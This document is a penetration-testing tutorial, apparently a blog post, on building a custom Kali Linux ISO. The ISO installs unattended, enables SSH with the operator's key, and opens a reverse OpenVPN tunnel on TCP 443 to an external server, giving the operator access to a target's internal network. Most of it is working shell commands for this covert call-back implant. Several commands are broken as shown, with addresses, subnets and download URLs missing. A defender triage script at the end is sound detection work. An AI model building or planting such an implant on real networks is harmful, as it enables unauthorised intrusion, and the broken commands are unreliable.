Kali 2.0 Linux ISO of Doom

Setting up the OpenVPN Server

We will first set up our OpenVPN server on a Kali Linux box with an external IP address (a.b.c.d). Once that’s done, we’ll build The Kali Linux ISO of Doom on the same machine and make it available for download through HTTP.

echo "1" > /proc/sys/net/ipv4/ip_forward
# Turn the server into the client's gateway
iptables -t nat -A POSTROUTING -s -o eth0 -j MASQUERADE
# Generate the OpenVPN server and client certs.
mkdir /etc/openvpn/easy-rsa
cp /usr/share/easy-rsa/** /etc/openvpn/easy-rsa
cd /etc/openvpn/easy-rsa/
sed -i 's/ --interact//' build-ca
sed -i 's/ --interact//' build-key-server
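. ./vars
# Initialise the keys directory, then build the CA that signs both certs.
./clean-all
./build-ca
./build-key-server server
./build-key client
# Generate the Diffie-Hellman parameters (keys/dh2048.pem) copied below.
./build-dh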
cp -rf keys/{server.crt,server.key,dh2048.pem,ca.crt} /etc/openvpn/
# Generate the OpenVPN server configuration file.
cd /etc/openvpn
echo tls-server > server.conf
echo port 443 >> server.conf
echo proto tcp >> server.conf
echo dev tap >> server.conf
echo ca ca.crt >> server.conf
echo cert server.crt >> server.conf
echo key server.key >> server.conf
echo dh dh2048.pem >> server.conf
echo server >> server.conf
echo 'push "redirect-gateway def1 bypass-dhcp"' >> server.conf
echo client-config-dir static >> server.conf
echo keepalive 10 120 >> server.conf
echo comp-lzo >> server.conf
echo user nobody >> server.conf
echo group nogroup >> server.conf
echo persist-key >> server.conf
echo persist-tun >> server.conf
echo status openvpn-status.log >> server.conf
echo verb 3 >> server.conf
# Now we create the client keys. We can have more than one.
mkdir -p static
echo ifconfig-push > static/client
cd ~
# start the OpenVPN server
/etc/init.d/openvpn start
# Generate SSH keys to later access the client.

Building the Kali Reverse VPN Agent ISO

Now comes the ISO generation. This is where we will build a custom Kali Linux ISO image with the specific set of tools we need for the engagement. The amazing part about this is how simple it is to accomplish compared to any other penetration testing distribution.

apt-get update
apt-get install git live-build cdebootstrap curl -y
git clone git:// build
cd build
echo 'update-rc.d -f ssh enable' >> kali-config/common/hooks/01-start-ssh.chroot
chmod +x kali-config/common/hooks/01-start-ssh.chroot
echo 'update-rc.d -f openvpn enable' >> kali-config/common/hooks/02-start-openvpn.chroot
chmod +x kali-config/common/hooks/02-start-openvpn.chroot
wget -O kali-config/common/hooks/02-unattended-boot.binary
chmod +x kali-config/common/hooks/02-unattended-boot.binary
mkdir -p kali-config/common/includes.chroot/root/.ssh/
cp /root/.ssh/ kali-config/common/includes.chroot/root/.ssh/authorized_keys
wget -O ./kali-config/common/includes.installer/preseed.cfg
echo openvpn >> kali-config/common/package-lists/kali.list.chroot
echo openssh-server >> kali-config/common/package-lists/kali.list.chroot
echo open-vm-tools >> kali-config/common/package-lists/kali.list.chroot
mkdir kali-config/common/includes.chroot/etc
mkdir kali-config/common/includes.chroot/etc/openvpn
cp /etc/openvpn/easy-rsa/keys/{ca.crt,client.crt,client.key} kali-config/common/includes.chroot/etc/openvpn/
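cat << EOF > kali-config/common/includes.chroot/etc/openvpn/client.conf
# Act as a TLS client and accept the options pushed by the server.
client
dev tap
proto tcp
remote your_server_ip 443 # remote server IP
resolv-retry infinite
ca ca.crt
cert client.crt
key client.key
ns-cert-type server
# Must match comp-lzo in server.conf.
comp-lzo
verb 3
EOF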

apt-get remove --purge libdebian-installer4 -y
tar xvf libdebian-installer_0.99.tar.xz
cd libdebian-installer-0.99
grep -R parser_rfc822 src
apt-get install automake libtool
autoreconf -i -v
make install
cd ~

lb config
lb build
mv binary.hybrid.iso /var/www/
service apache2 start
cd /etc/openvpn/
openvpn --config /etc/openvpn/server.conf

Now, when you boot a system from the ISO, it starts an unattended install and connects back over the VPN after reboot.

Bridging the Network Gaps

Once the VPN connection is established by the client, we can SSH to our internal Kali Linux agent and complete the final requirement: to bridge the remote and local networks together.

On the server

We enable routing to the remote network on the OpenVPN server:

route add -net gw

On the Kali Agent

We proceed and turn on IP forwarding along with IP masquerade on the remote Kali agent:

echo 1 >/proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s -o eth0 -j MASQUERADE

With this complete, our remote target network is now fully accessible to us. We can use any tools we have to interact with the remote network just as if it were connected as a WAN. All fully automated, and easy to set up. These sorts of customizations to Kali are where the real power lives.
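
Seen from the defender's side, the agent configured above leaves three observable traits on a host: IPv4 forwarding switched on, a NAT masquerade rule in POSTROUTING, and an OpenVPN tap tunnel over TCP 443. The triage check below is an added example, not part of the original post; the function names are hypothetical and the sample data (documentation-range addresses) is constructed.

```shell
#!/bin/sh
# Print nat-table POSTROUTING masquerade rules from iptables-save output.
masq_rules() {
    awk '/^\*/ { t = $0 }
         t == "*nat" && /^-A POSTROUTING/ && /-j MASQUERADE/' "$1"
}

# Succeed when a saved copy of /proc/sys/net/ipv4/ip_forward holds 1.
forwarding_on() {
    [ "$(tr -d '[:space:]' < "$1")" = "1" ]
}

# Succeed when an OpenVPN config uses a layer-2 tap device over TCP to port 443.
tap_over_tcp443() {
    awk '$1 == "dev" && $2 ~ /^tap/ { d = 1 }
         $1 == "proto" && $2 ~ /^tcp/ { p = 1 }
         $1 == "remote" && $3 == "443" { r = 1 }
         END { exit !(d && p && r) }' "$1"
}

# audit IP_FORWARD_FILE IPTABLES_SAVE_FILE OVPN_CONF: one line per matched trait.
audit() {
    if forwarding_on "$1"; then echo "FINDING: IPv4 forwarding enabled"; fi
    if [ -n "$(masq_rules "$2")" ]; then echo "FINDING: NAT masquerade rule present"; fi
    if tap_over_tcp443 "$3"; then echo "FINDING: OpenVPN tap tunnel over tcp/443"; fi
    return 0
}

# Constructed sample triage data (not from a real host).
make_samples() {
    echo 1 > "$1/ip_forward"
    cat > "$1/rules" <<'EOF'
*filter
-A FORWARD -j ACCEPT
COMMIT
*nat
-A POSTROUTING -s 192.0.2.0/24 -o eth0 -j MASQUERADE
COMMIT
EOF
    cat > "$1/client.conf" <<'EOF'
dev tap
proto tcp
remote 198.51.100.7 443
EOF
}

demo=$(mktemp -d)
make_samples "$demo"
audit "$demo/ip_forward" "$demo/rules" "$demo/client.conf"
```

Each trait also occurs on legitimate routers and VPN gateways, so treat a match as a prompt to check the host against its expected role rather than as proof of compromise.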

based on